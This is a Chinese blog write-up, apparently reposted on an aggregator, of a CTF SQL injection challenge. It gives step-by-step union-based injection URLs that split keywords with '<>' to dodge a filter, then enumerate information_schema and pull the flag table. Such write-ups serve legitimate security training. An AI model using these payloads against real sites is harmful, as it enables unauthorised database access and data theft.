CTF web之旅 2 - 走看看

zoukankan html css js c++ java

CTF web之旅 2

题目地址

https://www.ichunqiu.com/battalion?t=1
“百度杯”CTF比赛九月场题目名称：SQL注入

http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=1

正常回显

http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=-1

没有回显判断出存在注入点

判断字段数

http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=1 ord<>er by 3

用<>将order分隔开防止被过滤掉

判断显示位

http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=-1 union sel<>ect 1,2,3

2 回显出来得知2是回显位

爆出数据库名

http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=-1 union sel<>ect 1,database(),3

爆出表

http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=-1 union sel<>ect 1,table_name,3 from information_schema.tables where table_schema=database()

爆出字段

http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=-1 union sel<>ect 1,column_name,3 from information_schema.columns where table_name='info'

爆出最终数据

http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=-1 union sel<>ect 1,flAg_T5ZNdrm,3 from info

得到flag

下图是information_schema数据库结构图

查看全文

相关阅读:
TFS的安装
 反射发出动态类型介绍（上）
搭建基于SSI（struts2，spring，ibatis）的javaEE开发环境
 国内各大互联网公司相关技术站点2.0版
 第三部分静态链接（一）
谁删除了某个表
 迷你MVVM框架 avalonjs 0.85发布
 POJ 2367 Genealogical tree
修改进程占用内存SetProcessWorkingSetSize函数（多篇相关文章值得学习）
使用TWebBrowser时存在内存泄漏问题的解决方案（使用SetProcessWorkingSetSize函数，或者修改OleCtrls.pas源码解决问题）

原文地址：https://www.cnblogs.com/akger/p/14335668.html

Copyright © 2011-2022 走看看